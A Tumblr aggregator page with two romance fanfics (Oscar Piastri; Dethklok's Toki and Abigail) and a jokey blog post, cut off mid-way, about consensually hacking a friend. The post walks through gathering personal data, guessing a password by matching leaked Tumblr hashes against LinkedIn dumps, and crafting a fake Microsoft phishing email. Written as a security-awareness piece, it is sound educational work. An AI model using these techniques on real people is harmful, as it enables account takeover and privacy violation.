Tumgik
#wowee new tag alert
polvoronii · 1 year
Text
Tumblr media Tumblr media
[ocs] draped in your warmth
155 notes · View notes
piastree · 9 months
Text
Take a Chance with Me | OP81
oscar piastri x reader (fc: huh yunjin)
— Part 1
Next Part
Summary : Y/n's mistakenly takes someone's drink at a party. Despite the initial embarrassment, they engage in light chit-chat and discover a sense of familiarity. Oscar introduces himself, and they exchange greetings, marking the beginning of a new chapter in their story.
Notes: hiii! this is my first writing, if there are any grammatical errors or some other mistakes i wanna apologize in advance. I hope you like it and have fun while reading this<3 lemme know if you like it thankyouuuu
Tumblr media
Y/n chuckled when she remembered how embrassed it was when she took the wrong glass and sipped it like nothing was wrong. But she could feel the confused look from someone beside her. "I'm thinking you might have grabbed mine by mistake." She glanced to her side, wondering if the words she had just heard were indeed meant for her.
"Huh?" She finally turned to fully face that man. He chuckled at her puzzled expression, but eventually, with a raised eyebrow, he pointed to the glass she was holding. "Oh my goodness! I'm sorry! I didn't mean to take your drink." Her eyes widened in shock, and her heart raced as embarrassment flooded over her. He held back his laughter. "No worries. I can take another one," as he said, he cracked a grin like a friendly cat. His eyes squinted playfully, giving off a vibe that was both laid-back and amused. "Let me grab you another one." "No need for that, I-" Ignoring him, she sauntered away to fetch a new drink, intending to replace the one she had mistakenly taken from him earlier. It didn't take long for y/n to return. Once she returned, they engaged in light chit-chat, chatting about who invited them to the party. It wasn't until later that she realized the guy she'd been talking to looked kind of familiar. "So, which friend brought you here tonight?" she asked. "Oh, just through some mates, racing circles and all. What about you?" "Just here with a friend. By the way, you seem oddly familiar. Have we met before?" "I get that a lot. Maybe you've seen me on the street or something."
She just laughed, shrugged it off, and took another sip of her drink. At the same time, he shot her a cheeky smile, sneaking a few glances while she checked out the scene around her. After a bit, he decided to break the ice, "I'm Oscar, by the way."
"I'm y/n. Nice to meet you, Oscar."
With a cheerful smile, they exchanged a warm handshake. It marked the beginning of a new chapter in their story.
Tumblr media
oscarpiastri
Tumblr media
liked by yourusername, landonorris, mclaren and 365,288 others
oscarpiastri Wowee… that was a cool weekend 🧡
view all 3,637 comments
user just calm down bro, it's your first season💀
user our starboy!! so proud🧡🧡
user what an incredible talent boyyy!
yourusername such a fake rookie
oscarpiastri i like to keep things low-key🤭
yourusername can't wait for another surprise then
user lmaooo
user your pace and overtakes are 1000/10 🔥👏🏻
yourusername
Tumblr media
liked by oscarpiastri, yourbff and 1,288 others
yourusername camera crumbs
view all 101 comments
yourbff MYY GIRLLLL<3
user cutiesssss
oscarpiastri those flowers have nothing compared to u
yourusername lol you're making the flowers jealous, i'll let the garden know it needs an upgrade😂
user what oscar is doing here????
user did i miss something??
user OSCAR?!!?????? FLIRTING TO A GIRL???
yourusername chill guys he likes to joke around😂😂
user new wag alert!!
Tumblr media Tumblr media Tumblr media
yourusername added a story
Tumblr media
bring it home, boy!
yourbff uhhh i can smell something fishy yourusername care to elaborate, sherlock?
user wow??? what is this now??
landonorris where is the cheer for me??? i thought we were friends yourusername lol we are! yourusername goodluck lando! i'd love to see both of you on the podium<3
yourusername
Tumblr media
tagged: oscarpiastri, landonorris
liked by oscarpiastri, landonorris, yourbff and 14,555 others
yourusername P2 and P3, boys!! Enjoy your moments. What a day to remember 🧡
view all 957 comments
user CUTEE OUTFIT Y/N!!
user and now lando also here? who's she
user wow oscar put earmuffs on her??
user at this point i won't believe if they're just friends
landonorris oh now i'm your friend?? cool thanks
oscarpiastri stop overacting💀
yourusername should i post a whole photo dedication for you?😉
landonorris i'm not looking for trouble
user what is that mean landooo?? bcoz someone must be jealous?😂
user look at how oscar defending her lol
oscarpiastri you owe me a drawing of a four-leaf clover on my helmet
yourusername stay tuned for some top-notch artistry<3
user oscar indirectly said that y/n was his lucky charm!!
Tumblr media
"Can't you stay for one more night?" Oscar asked. He walks over to y/n who is arranging her luggage a little hurriedly.
Y/n smiled before saying, "work can't wait. But I promise I'll come another day."
"Okay, i'll counting the days until you return."
She laughs, then stands up and pulls Oscar into her arms. "You're doing a good job. Keep going!"
"I'll miss you." He hugs her tighter, as if he's not willing to let her go.
"Me too."
They fall into a moment of silence, soaking in each other's warmth before having to go back to being apart for a period of time they don't know how long.
She never expect the party that night to lead her into a complicated situation, where she has to love someone who is out of her reach. Remembering how stupid she was that night for not recognizing Oscar right away when his face looked so familiar, and how Oscar didn't say anything until she finally realized.
"Oh! I have something for you."
She opens her bag and takes something out. A bracelet with a four-leaf clover. "I don't have the skill to draw, and I wouldn't risk making your helmet look ugly."
Oscar takes the bracelet and immediately puts it on. "I can't agree more. But it's more than enough," he replies mischievously while laughing. He is so happy to see the bracelet now neatly wrapped around his wrist. "Thank you."
"Your lucky charm when I'm not around."
Tumblr media
yourusername
Tumblr media
liked by landonorris, oscarpiastri, yourbff and 16,581 others
yourusername life lately😴
view all 1004 comments
user syntax error babe my brain stopped working when i saw u 
user i just can’t get enough of this hair omg
user me too! so gorgeous😭
yourbff red y/n is too legendary
comment liked by oscarpiastri
yourusername is this genuinely a compliment or a subtle jab?
yourbff lmaoo babe😭
oscarpiastri wish u were here
yourusername me too</3
user oh you are not with oscar rn :(
user man is so clingy what should i DO
user was it a chat with oscar?? bcoz YES SHE IS ON FIREEE
oscarpiastri
Tumblr media
liked by yourusername, lewishamilton, charles_leclerc and 221,681 others
oscarpiastri A second reason to smile 😁🏆
view all 2564 comments
mclaren what a weekend!
user this man’s gonna be world champion one day🙌
comment liked by yourusername
user i refuse to believe you’re a rookie man
yourusername me too
user y/n camping on oscar's comment section
yourusername my driver of the day!❤️
oscarpiastri ❤️
user what's with the red heart???
user is it the soft launch? OMGGG
yourusername also congrats to lando!! proud of both of you🔥👏
landonorris thankyou, y/n! btw come to the race, someone is missing you
user man is so wHIPPED
yourusername p.s hope oscar recovered well after lying on the floor
comment liked by oscarpiastri
yourusername added a story
Tumblr media
someone is smiling ear to ear @/oscarpiastri
yourbff lmaooo he looks so happy yourbff he's completely in love with you yourusername grateful is an understatement<3
landonorris his eyes speak love lol yourusername shut upp lando landonorris glad both of you finally opened up about your feelings yourusername thankyou 2 u❤️
user his emotions are written all over his face
oscarpiastri
Tumblr media
liked by yourusername, logansargent, landonorris and 540,188 others
oscarpiastri thanks for mistakenly grabbing my drink. Grateful for every twist of fate that brought you into my life🍻❤️
view all 5555 comments
user spill the tea we want to know more about the storyy!!
user my oscar and yn cutie<3
user hope for your happiness, oscar and y/n!❤️
landonorris how long did it take you, mate?
yourusername felt like forever
oscarpiastri you have no idea
yourusername but it was worth the wait
user awww y/n🥺
oscarpiastri ❤️
yourusername thankyou for never telling me you are oscar piastri the mclaren driver of formula 1😒
user NOOOO SHE MUST BE SO CLUELESS
logansargent he is the worst
oscarpiastri u know i didn't mean to keep it a secret, babe
user THEY ARE SO CUTEEEE
yourusername
Tumblr media
liked by oscarpiastri, charles_leclerc, georgerussell63 and 85,128 others
yourusername love you always, Oz! May the four-leaf clovers always on us🍀❤️
view all 6514 comments
oscarpiastri love you too, always🍀❤️
comment liked by yourusername
thankyou for reading! don't hesitate to give me a feedback❤️
475 notes · View notes
okietokiee · 5 years
Text
Tokigail / Post-Doomstar
@edgtheow  I always see your Tokigail posts and tbh that’s one of my favorite rare pair ships too!! But their ao3 tag is practically empty ;o; so I wrote a sappy post-dsr fic because this rare pair deserves some love :’)
This is set during Doomstar when the Dethlights happened and then immediately after. And some headcanons I’m using for context: both Toki and Abigail were brutally tortured by Magnus and MMA, but the Dethlights ordeal healed most of Toki’s physical injuries
Rating: T
Abigail’s POV
Abigail was a logical woman. Growing up, she prided herself for her rationality and sensible nature. She’d see something unfamiliar and a majority of the time she was able to analyze the issue or situation and decide what to do next. 
This was not one of those times. 
She could still hardly even believe those selfish, narcissistic assholes actually even showed up. And with such stupidly dramatic timing too, when she had already fully resigned herself to her painful, brutal end in this dungeon at the hands of a man she hardly knew.
And now, looking up at this blindingly bright beam of light levitating those assholes and making them look like some kind of godly celestial beings, she was half convinced this was all just a wild fever dream she was experiencing moments before her death. 
It didn’t help that after the sudden burst of color, everything was a literal blur of empty scenes and lost time. She felt nauseous and lightheaded, a state she’d become accustomed to after months locked up. After an indefinite period of time that could’ve been five minutes or five hours, she was drowned with a litany of random voices she couldn’t distinguish. 
The only distant, grounding voice that broke through the fog was a warm, familiar, “Abigail, we ams safe now…” 
And that familiar sound was enough to convince her that yes, this was real. This was it. The whole world could fall to complete shit, but she’d recognize that voice anywhere. She let out a deep, contented sigh, as she was hoisted up by a taller body. 
She closed her eyes, finally embracing the exhaustion that’s been permeating her whole being for what felt like eternity. 
——————
A few weeks later, Abigail awoke to the faint whirring of machinery and nauseatingly bright hospital lights. She frowned, feeling something weighing down on her left side, and she chanced a small movement of her head to see, to her relief, a sleeping head with long, chestnut brown hair. 
Toki had a firm hold of her hand, their fingers interlaced in a familiar grip. She chanced a small smile, feeling her body relax fully into the hard hospital mattress. 
Seeing Toki somehow alleviated a lot of her sudden fear and anxiety. Not all of it, no, not by a long shot. But they were each other’s only solace down in that hell, and it seemed her brain still recognized him as such. 
She was surprised to see that Toki looked infinitely better than she remembered. Though it was expected since they were finally being treated, she didn’t think it was possible for him to gain back all that weight so fast if what she could see of him was anything to go by. His sallow, sunken cheeks looked full and healthy again, and his previously corpse-like pallor had returned to a state similar to before the kidnapping. 
She had a passing idea that perhaps that blinding beam of light had something to do with this, but just thinking of that ordeal gave her a splitting headache. She sighed weakly, untangling her fingers from the guitarist’s to instead idly stroke his hair in familiar movements. 
She had no idea how much time could have possibly passed, Toki’s soft breathing and her own idle ministrations the only thing she felt rooted her to reality. And Abigail was startled to hear an abrupt cough, and she sat up a bit to see one Swedish guitarist looking more uncomfortable and awkward than she’d ever seen him. 
Skwisgaar nervously shuffled closer to her bed. “Ah… I sees you ams awakes.” He cast an unreadable glance at Toki. “He woulds nots leaves you alone. We ams glads you ams all rights.”
Abigail was not impressed and gave Skwisgaar a look that screamed, ‘Really? That’s all you have to say?’
Skwisgaar physically gulped, his guilt and discomfort apparent. “I… no, de whole bands, we wishes we came earlier. We ams all stupid idiots. Ams all so sorries, ands I know dere is no way to evers really apologizke for dis, buts I just…” He faltered. “He… Toki I means, he so worrierds and keeps saysing he woulds never have mades it wivout yous. I just wants to takk, uh, tanks you for beinks dere for him. We knows it was hells for you too, you didn’ts need to do so much, buts you dids.”
Abigail let a small grin grace her deadpan expression. She chanced a reply, not surprised at how sore her throat felt and her weak, cracked tone of voice. “There’s no need to thank me Skwisgaar. Toki and I… we, well, we needed each other to stay sane down there.” 
Skwisgaar gave her an unidentifiable look in return and seemed as though he were about to say more, when Toki began to stir awake at Abigail’s side. 
“Abbygale?…Yous awakes!” He exclaimed after blinking the sleepiness from his eyes. He shot up from his chair and held Abigail in an excited, surprisingly gentle hug. He was muttering gibberish as he held her, an enthusiastic mixture of Norwegian and English and everything in between. 
Abigail chuckled warmly, returning the hug as best she could with an IV up her arm. 
Satisfied, Toki backed off, but kept his hands on Abigail’s shoulder moving in soothing ministrations. His face was close and expression simultaneously joyous and anxious.
“Abby, Toki ams so happies yous wakes up! De doctors, de says dat if you sleeps for too longs it woulds be real bads, buts I knew you woulds wakes up! Toki knows! How ams you feelings? Anyting hurts? Ah, but de doctors! I go gets dem, dey needs to sees you, but Toki don’ts wants to leaves yous! What we do-”
Abigail gave Toki a fond, exasperated look. She was about to mention that Skwisgaar could alert the doctors, but when she looked to her side she was confused to see the spot empty, the Swede having made a hasty, unnoticed departure. 
Within moments a team of medical professionals rushed in to check up on Abigail’s condition. 
After they left satisfied with their findings and to prepare some further tests, Abigail heaved an anxious sigh. From what the doctor had said so far, it seemed that physically she was doing well considering what her body had been through, but she’d still need quite a bit of physical therapy and further tests. Psychologically though, that was to be determined, and considering the paranoia and anxiety permeating through her body, she did not have high hopes for that.
But, despite whatever trials awaited her, one look at Toki’s eager, hopeful, and absolutely radiant smiling face made her feel like it would be ok.
They made it out of one hell alive, they’d make it out of this too. 
——————
Toki’s POV
Toki saw a blazing, blindingly bright light flash before his eyes and then he felt weightless. He felt it tear through his flesh, simultaneously eviscerating his very being but also creating something new with the ashes. It was disorienting how suddenly it came, and even more so how abruptly it passed. Before he knew it he was back on the floor, fallen to his knees, overcome with exhaustion.
Everything was a blur. His bandmat- no, his brothers breaking into the room and freeing him and Abigail, the sudden lights that seemed to come from the heavens, and the dizzying aftermath of that. If he was to be completely honest, the only constant, grounding thought that helped him regain his bearings was the person who’d been his only comfort for months on end. 
“A-abigail!” He cried, seeing her on the sidelines looking near death. He rushed to stand up, but almost went tumbling down from his shaking legs. Nathan was able to grab hold of him and steady his balance just in time. 
“Abigail! We ams safes now!” Toki yelled. He saw Skwisgaar gently help Abigail up and was immediately distressed to see that it seemed she’d passed out. 
And everything moved so much faster from there.
But regardless, from the warehouse, to the helicopter, and right to the hospital, Toki did not stray far from Abigail’s side. 
——————
Numerous doctors were astounded by the state Toki was in, and not for the reasons everyone was expecting. Though he wasn’t in perfect health, he was exceedingly better than seemed possible for someone stuck in the conditions he was in. 
However, though physically he healed up miraculously fast, he was becoming a nervous wreck. Each day that passed with Abigail still asleep with no signs of waking up made Toki feel like he was slowly but surely suffocating.
And of course, there was the rest of Dethklok too. His brothers. They were as supportive as a group of traumatized, emotionally-stunted man children could possibly be. 
It was strained at first, four members expecting some kind of (well-deserved) anger and resentment from Toki’s side. Being tortured while their bandmates party around the world in a drug-fueled haze would put a bad taste in anyone’s mouth.
But the elation of finally being reunited with his dumb family soothed whatever jagged edges there were and Dethklok had a brutal (read: tearful) homecoming for their rhythm guitarist. 
However, despite their high spirits, Toki couldn’t be content. No, not yet. 
After being cleared by astounded doctors with a clear bill of health after just a few days, he spent his time in Abigail’s room, reading, coloring, sleeping, waiting… always waiting.
It was on one of those quiet days when Skwisgaar and Nathan came to visit, the latter of which threw a surprisingly soft, familiar lump at him. 
“Wowee! Yous guys brought me mines Deddy bear! Takk!” Toki exclaimed with glee, holding his fluffy friend tight. 
“Yeah, we, uh… well, we thought you’d miss him. Since you haven’t been to your room since you got back and everything.” Nathan shrugged, trying to hide a pleased smile. 
“Ja, ands we cames to check ups on yous,” Skwisgaar added.
Toki stiffened. “I ams doins fine.” He said with a rigid tone.
“Yous havent’s left dis rooms in weeks.” Skwisgaar sighed. “We knows you ams worries about hers, but you needs a breaks sometimes.” Toki frowned. “Ams fines. I needs to do dis.”
Nathan coughed, sensing the tension in the air. “Yeah, to be fair Toki, you haven’t even stepped foot in Mordhaus since you got home. And that’s, uh, saying a lot. Since our hospital is attached to Mordhaus and everything.” 
Toki visibly deflated, his expression taking a somber turn. “Abigail… shes was always there for mes, now I needs to bes there for her…” 
Nathan stole a glance at Abigail, his gaze softening. “Yeah, I get it.” 
Skwisgaar, on the other hand, stole a glance at Toki’s downcast face. “Tokis, she wills be alrights…” He tried to say confidently.
Toki gave him a broken look. “Ja, she has to bes…” 
After a few more hushed, somber conversations, Skwisgaar and Nathan were on their way, sensing that Toki wanted to be left alone. 
Though the others visited often, Toki truly didn’t mind some solitude. It wasn’t like he was completely alone anyways. As long as Abigail’s heart was still beating, she was still with him, and he’d stay by her side as long as she needed him to. 
And apparently she only needed him to wait just shy of 4 weeks. 
He was stirred awake by a melodic, albeit weaker voice. He thought he was dreaming for a moment, but was awestruck to see that wasn’t the case. His voice going a mile-a-minute in a mix of every language he vaguely knew. And his emotions were going haywire, his arms both desperate to hold her and scared to death of accidentally hurting her.  
He was infinitely grateful when the doctors rushed in so he wouldn’t have to leave her side. 
After a short check-up and learning that Abigail really was going to be fine, he beamed and was blushing with pure, unadulterated joy. Abigail was awake. She was ok. It was going to be alright. He felt a heavy weight of worry and anxiety lifted off his chest. 
They were both going to be alright.
--------------------
I still plan to add their road to recovery and Dethklok’s POV of their relationship, but I got excited and wanted to share what I had so far so it still has some weird mistakes but aahjkgfure I really like writing Toki smitten with Abigail bc I’m smitten with her too :’)
Also, I left room for possible Skwistokgail because @calliopinot made that one of my all-time favorite OT3 pairings :^) It won’t happen in this fic probably, but the subtle implications !! 
19 notes · View notes
defaultnamehere · 7 years
Text
Operation Luigi: How I hacked my friend without her noticing
This blog has moved! This post and other mistakes are now at https://mango.pdf.zone
Hello and welcome to a blog post. I am writing it and you are reading it. It's amazing what we can do with computers these days.
Several months ago
I'm at a ramen place with my friend Diana. Diana isn't her real name, but we're going to pretend it is because that's what all the cool journalists do and I wanna fit in too so don't ruin this for me okay.
I ask her if it would be okay for me to try and hack all her stuff. She's instantly visibly excited. I explain how this could result in me seeing everything she's ever put on a computer ever. She tells me she thinks this is going to be "so good". We lay down some rules:
I'll start some time in the next 12 months
No deleting anything she has
No disrupting her daily life
Stop asking if she's sure it's okay
Bonus rule from me: Do this entire thing in stealth mode. Don't ever let Diana know that I've started until it's too late.
I mean, obviously it worked since you and I are having this nice little textual discourse right now. Take my hand metaphorically, and I'll guide you through what I tried, my many flubs1, and how to protect yourself from what I did2.
And uh also at the end Mario's green friend is there.
Part 1: Research
"""Open Source Intelligence Gathering""""" AKA googling furiously and pretending you went to uni for this
Alright uh I'm pretty sure the first thing you do when you're hacking someone is find all their personal information. I'm talking about her email, phone number, address, star sign, whether she uses Android or Windows Phone, her birthday, and so on.
Jeez we're gonna need to know her email address aren't we?
People put lots of their information on LinkedIn (an information landscape that connects your inbox to people you met once in a bar and will forever file under "misc") because it tells them to.
The first thing I see on Diana's LinkedIn3 is her email address. I hastily put on my black hoodie and get my arms a bit stuck in the sleeves. Hacker voice I'm _in_4. Immediately I sigh and put my hands on my temples like a stressed-out banker. It's a @hotmail.com address, which surprises me since, well, who's using Hotmail in the year of our lord 2017? I mean geez if you used hotmail you'd miss out on gmail's excellent security features heyoooo
[x] email address [ ] the respect of my peers
Does she use this email for Twitter?
Yep.
How about her phone number?
I type a bunch of extremely clumsy things into Google. I'm talkin' "[email protected] phone". A matrix of what looks like zeroes and ones but is actually Google search results flies down my screen at about the speed a normal person would scroll at.
There's a sign-up page for a club she started at her university. The page says "Contact Diana Lastname at [email protected] or [her phone number]". pew pew got 'em.
[x] email [x] phone number [ ] the respect of my peers
Storing the goods
I paste all these things into a Google Doc - an advanced NSA hacking tool leaked in the recent Shadow Brokers incident.
While googling securely, I find an old blog of hers from 2009. It has a search box. I immediately slam "pet", "cat" and, "dog" in that search box like it's 2009. The name of someone's pet is often somehow involved in their security, either as their password or as a "Security""" question or something. I find the name of her dog from 2009 and vigorously paste it into my Google Doc.
Let's try getting into her iCloud account
Armed with my weapons-grade Google Doc, I'm ready to have a go at trying to get into something of Diana's5.
I don't really have a good reason for going after iCloud, so if you could just give me a break for one second
If I click "Forgot Apple ID?" on iCloud, by entering Diana's full name and email address, Apple tells me her Apple ID, and my screen permanently changes to green-on-black text to suit my new lifestyle.
I'm clicking around and there's a section called "account recovery". Sure, I'll have a go.
I can recover the account by clicking "I've uh lost my phone and forgot my password AND locked out of my email". Apple says "okay you colossal bozo, fine, but give us a phone number you CAN access, and we'll SMS you instructions to get back into your account". If I was in a movie doing ~crimes~ then I'd use a burner phone number. But since this is just my friend, I use my real phone number. I get an SMS from Apple being like "We received your request and will get back to you within 4 to 6 business millennia. Our Neo-Future Customer Service Representatives will contact your next-of-kin by whatever means of communication is prevalent at the time."
There's another "account recovery" option that says "use a device you already have". I click this, hoping to get a list of Diana's Apple devices. Instead it gives me this:
Daaaaaaaaaaaaaaaammmmit.
I have taken the wrong path in this text adventure game.
I've just notified Diana that someone's trying to reset her account.
For me that would set off all kinds of alarm bells and I'd start furiously investigating what's going on with all my accounts because I'm very cool and collected. But I'm just going to hope that Diana is a normal human being who is not obsessively paranoid like me and just ignores all of those pesky automated emails from Apple and Microsoft being like "blah blah account blah" or "blah blah new sign in blah" because I mean who really has time for those we've all got places to go and phones to scroll I mean reallY who's gonna pay attention to one liTtlE email when there's a whole OCEAN of low quality memes to scroll past on Facebook? I mean wouldn't you rather see some nice political memes? Newsfeed alert: Some guy from high school has just been tagged in- oh wow lOok this one's about your local government, wowee they've even managed to use the meme font while standing their ground and writing all the text as though it's a trying-to-sound-formal letter from your school principal who is still desperately trying to combat cyberbullying using nothing but stern words and beginning every sentence with "In regards to...."
There's no way for me to know if she saw the notification, so I stop rolling around on the floor whispering about low quality memes and get back to work.
Several days later
My phone rings. I can feel the vibration in my pocket and I'm like "is someone calling me here in the year of our lord 2017 I can't believe this". I don't recognise the number.
"Hello?"
"Hi, who am I talking to?"
"It's uh Alex."
"Alex?"
"Yeah."
"Alex ``?"
"Uh, noooo it's-"
"Ohhhhhhhhhhhhh."
"Wait so who am I talking to?"
It's Diana.
"What's up?", I ask.
She explains to me how she got an email from Apple about her account and there was a phone number in it. I tug my collar several meters into the next room, knocking over several carefully-potted indoor plants.
I hit pause on this whole thing, immediately own up, and say "yep, that was me, no need to worry, and I didn't get anywhere, your iCloud account is safe and s- WAIT a minute are you telling me you got an email from Apple saying someone tried to reset your account, realised it wasn't you, saw the phone number, and then CALLED it? What was your plan if some hacker answered??"
She didn't have a plan. She just called it as soon as she saw it, the absolutely off-the-rails lunatic.
We have a nice chat and agree to hang out later. She asks me if I've "hacked her already", and I say "no comment" to preserve my so-far flawless operational security.
Before I hang up, I wanna show off my work so far.
"Hey Diana, one more thing"
"Yeah?"
"Check it out. Did you ever play a game called........ Fashion Fantasy Beach?"6, I say, coolly and relatably.
Diana freaks out and starts laughing. She's forgotten about this game and me reminding her of her account brings back good memories.
"Can you like, find all the accounts I had on all those game websites?"
Sweet young Diana. If only it worked that way. Hacking can only be used for stealing government secrets and ransoming bitcoins. It's just not that simple.
"By the way, just checking, it's still okay for me to try and hack all your stuff right?" "SO okay"
Part 2: Hackinggggg
At this point I could reset Diana's password for some services by answering her "Security""" Questions with all the information I've gathered.
But, I realise, far too late and to the live studio audience's disappointment, that would violate the "don't interfere with her daily life" part of our deal. If I reset her password, this will lock her out of whatever account I reset. So, I have to get access stealthily. This will uh heavily involve knowing her password rather than resetting it.
For a long time I consider doing the renaissance-era "send 'em a word doc with a macro in it to get control of their computer then submit to defcon" but I worry that sweet young millennials like Diana don't even use Word because they do everything on their phone or Google Docs while simultaneously consuming 17.28 avocados per second look it up.7
I guess that makes the most valuable thing in her life her email. If you remember earlier, I cunningly divined her email address in Part 1, so I'm basically halfway there. If I get her email, I can just reset her password for Facebook, Twitter, Fashion Fantasy Beach, etc. My cyber attack vector cyber entry point exploit would then be typing the password into the Hotmail login screen using the Google Chrome Web Browsing Software.
The shady password market
Alright listen we're about to go into password paradise so buckle whatever it is you normally buckle. Hackers right, they hack websites. Hoo boy they just love to pop those hypertext pages. Like Dropbox, MySpace, LinkedIn, Adobe, Tumblr, and many, many more. They try to steal everyone's username and password from these sites by making a copy of the database and taking it. Sometimes, the database of usernames and passwords they steal gets released on the ~dark web~, for free or for money. Conveniently, there's a website (https://haveibeenpwned.com) which lets you type in your email address (not your password you big bozo) and find out whether any of your passwords have appeared in these leaked stolen databases.
But.... nowhere does it say you have to type in your email address. Cunningly, I type [email protected], executing hacking.
Here we can see a couple of websites Diana has accounts on have been hacked. The only one which had passwords stolen for Diana was Tumblr. So the next goal is to acquire the Tumblr database leak from 2013.
Let's get the old Tumblr database
I try to use my ~hacker connections~ to get a copy of the Tumblr database. I meet a someone whose forum handle is like d4rkrayne or whatever in a local park at 11pm. A colossal vape cloud leads me to him, waiting under a tree, puffing furiously. I look down my 1987 mirror-tinted aviators and say "how much?" (my voice comes out several octaves lower and all grizzly like a 40-year-old generic white dude movie star with like, juuust the right amount of stubble). He sells me the database on a pile of 442 floppy disks for 5,000 credits. What a ripoff. I teleport behind him, say "nothin' personal, kid", and hoverboard-kickflip into the night.
...I download the Tumblr database from a publicly accessible, unauthenticated, absolutely non-dark web website. I scramble to get back in my black hoodie, and whip on a second pair of sunglasses over the first. I'm in.
Ancient forbidden password rituals
The Tumblr database dump - a hacking Quest Item - is one long file with lines that look like this:
[email protected]:3a1920ceb2791d034973c899907847cb58810808
That weird thing after the email is a password hash. A password hash is like a scrambled up version of the password. You can't unscramble it. If you know the password though, you can scramble it and get the same omlette, if ya know what I'm sayin'🍳.
My goal here is to figure out what Diana's actual password is, given that I have her password hash. This process is commonly known as "hacking".
These particular passwords are not just hashed, but also salted8. This means that before each password is hashed, the good folks at Tumblr added an extra bit of text to the end of each one. So instead of hashing, say, cooldad64, they'd hash cooldad64HNc62V8.
Finding the salt
There's no official information on what kind of hashes are in Tumblr.txt.
The fully sick attack I want to do is: hashing a big list of passwords I just happen to have lying around wow and checking if any of the hashes match Diana's password hash. This is called a "dictionary attack", because the person who invented it was actually a dictionary. The trouble is, you need to know the salt to do this.
I google around some more, bask in the glory of very poorly constructed sentences on some ~hacker forums~, and ask my ~hacker connections~ in an attempt to find out what the salt is.
But I can't find it because fun fact I'm a total fraud.
Can I get the password... without the salt?
So remember how Tumblr salted the passwords by sticking some random stuff on the end to thwart wannabees like me?
The trouble is.... They stick the same thing (in my example, HNc62V8) on the end of every password. This isn't considered the best practice here in the year of our lord 2017, because it means that users with the same password have the same password hash. The emails and passwords would look like this:
[email protected]:cooldad64HNc62V8 [email protected]:cooldad64HNc62V8 [email protected]:p@triots69HNc62V8 [email protected]:Bongo1HNc62V8
I search Tumblr.txt for not [email protected], but for her password hash. (3a1920ceb2791d034973c899907847cb58810808)
I find more than 20 Tumblr users with the same password as Diana aw yeah
[REDACTED]@email.com:3a1920ceb2791d0... [REDACTED]@email.com:3a1920ceb2791d0… [REDACTED]@email.com:3a1920ceb2791d0… [REDACTED]@email.com:3a1920ceb2791d0…
This makes me think that Diana's password is probably not very unique, since all these other Dr. Who enthusiasts on Tumblr have also thought of it.
But also. Now I've got 20 other email addresses with the same password as Diana. Thanks to the miracle of everyone using the same password for everything, I've got a way to find Diana's password.
I just so happen AGAIN WOW WHATTA GUY to have the LinkedIn database dump from when LinkedIn was 360 whirlwind slam hacked in 20129.
Why do I care about the dump from the LinkedIn hack, you ask, fatigued from many gags and desperate for the part where we actually hack Diana?
LinkedIn also hashed their passwords in 2012, but they didn't add that freshly ground pink Himalayan rock salt to them. Also, the password hashing method they used is cripplingly insecure10 (SHA1 for all you extremely online people out there). Because of these flubs, most (>97%) of the passwords in the LinkedIn dump are available in plain text, not even hashed at all thanks to the hard work and GPU cycle donations of people in the password cracking community.
I get the 20-ish Tumblr emails who have the same Tumblr password as Diana, and look them all up in the LinkedIn dump. They're not all in there, but good enough baybee.
[REDACTED]@email.com:qwerty1 [REDACTED]@email.com:killer6 [REDACTED]@email.com:qwerty1 [REDACTED]@email.com:qwerty1
More than 80% of them have the same LinkedIn password. (Which we will say is qwerty1.)
This has gotta be Diana's password from Tumblr in 2013. Since all these people had the same password on Tumblr, and most of them have the password qwerty1 on LinkedIn, it's very likely that Diana's Tumblr password is qwerty1.
I try to log in to her Hotmail account with the password qwerty1.
"Incorrect password"
Wait please this was supposed to be easy please no why is it like this don't do this to me
Oh come on I was supposed to be hacking a normal person who uses the same password for everything this isn't fAiR. There are entire criminal industries built on the idea that people use the same password all over the place because nobody cares enough to remember more than a few passwords because they've got things to scroll on their phone okay.
Somehow, Diana is one of the rare few people who is not a security expert but has more than one password for her stuff.
I try this password on a few of her other accounts (Facebook, Twitter, iCloud) and it works on none of them11.
On Facebook, I'm conveniently informed that this password was her password 5 months ago, but isn't any more.
Looks like I just missed out. The plot thickens audibly.
This was supposed to be the part where I say "and then I logged into her email 100% stealthily", equip my third consecutive pair of sunglasses, and move on to the next bit. But alas, Diana was only in one leaked password list on haveibeenpwned.com at the time, so there goes that.
Fiiiiiiiiiiine whatever I don't even care I'm not crying, you're crying. Time to do this the old fashioned way. And by "the old fashioned way" I of course mean "the way government hackers do it".
Part 3: Hackinggggg (again)
Social engineering
Alright so we're just going to trick her into telling me her password. Is that cheating? Basically. But absolutely I'm going to do it anyway.
To get into her email, I need to know Diana's email password. Resetting the password won't work (since that would interrupt her life by locking her out of her email). I don't really wanna follow her around, man-in-the-middle attack her phone or laptop when it connects to insecure WiFi and steal her browser session, so that leaves us with: phishing.
You may have heard of "phishing", the process of emailing someone and tricking them into doing something, like giving you their password.
Now, hold up bucko, you're probably thinking of the kind of phish where someone says "good day sir I nigerian prince give you $1 million dollars USD u are royalty 2 me" etc. etc.
Or maybe you're thinking of someone sending an email that says "[heavy breathing] pls clikc on my urls http://click.here.to.get.ripped.in.three.weeks.verylegit.link/6x9M;PjxrY=WrS33n$Hcracked__767windows8+bitcoin.gpg.exe"
But with nothing more than paperclips, chewing gum, a single fidget spinner, and an advanced psychology degree, we can not only steal Diana's password, but do it without Diana realising she's been tricked.
Hand-crafting artisanal phishing emails to sell at the Sunday markets
Let's write down what we want to do:
Get Diana's email password
Don't let her realise that the email is not legit
Hmm I guess there were only two dot points uhh sorry that doesn't seem worth having dot points at all ummmm
So anYwAy the trick to phishing is that you don't want to engage the victim's attention. You want them to interact with your email mindlessly, without thinking it's a big deal. Kinda like how you click through email notifcations from Twitter (or anything that sends you email notifications) without really thinking about the email, because you're thinking about what awaits on the other end.
The other way, rather than distracting the victim, is to misdirect them. You give them something that's way more interesting to pay attention to than your dodgy link. Common examples of this include emails that say "OMG your account has been HACKED, log in here to fix it".
But of course, you log in to a fake website which steals your password.
Wow actually that sounds pretty12 easy13 doesn't it? Let's try that then.
I'll make an email that says "Your Microsoft Account Has Been Hacked And Uh If You Don't Log In Now It Will Get Deleted So Uh Yeah You Better Log In".
Instead of designing my own legit-looking Microsoft email, it's easier to just copy one that Microsoft has already made. I search my hotmail account14 for an automated email from Microsoft.
I use the incredibly cutting edge "Inspect Element" feature of the popular hacking software, Google Chrome, to edit the text of the email but keep the look. As I right click and hover over "Inspect Element", my laptop instantly explodes, I get root access to Microsoft, I'm added 50 times to every NSA watchlist, my text permanently changes to green-on-black, and I'm accepted to DEFCON.
Now it looks like this:
